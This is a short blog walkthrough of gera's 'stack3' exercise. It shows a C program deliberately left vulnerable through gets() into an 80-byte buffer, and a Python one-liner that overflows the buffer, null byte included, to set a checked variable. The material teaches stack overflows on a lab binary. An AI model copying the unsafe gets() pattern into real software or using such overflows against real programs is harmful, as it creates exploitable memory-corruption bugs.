/* stack3-stdin.c *
* specially crafted to feed your brain by gera */
#include <stdio.h>
int main()
{
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if(cookie == 0x01020005)
printf("you win!\n");
}
We can see that it's similar to the previous challenge. The subtle difference this time is the 0x00 character. We can see that in the ASCII chart, it's "null". Let's get this program compiled!
Analysis
Ensure that you have the program code above compiled as shown in the previous post. Compiled? Warnings? Awesome. Let's move forward.1. Open up a Terminal window if you don't already have one open
2. Browse to the location of stack3 if you aren't already there
3. Run it:
./stack3
4. Type in some letters and press Enter:
AAAA
5. Nope, you win again stack program! Let's use some Python.
6. In Terminal, type in and press Enter:
python -c 'print "A" * 80 + "\x05\x00\x02\x01"' | ./stack3
Nice. Looks like it was a pretty simple one today! Even with the addition of the "null" character, we're still able to pass the program the key to the challenge. The fourth and fifth challenges look to add a bit more challenge to the series. Stay tuned!
No comments:
Post a Comment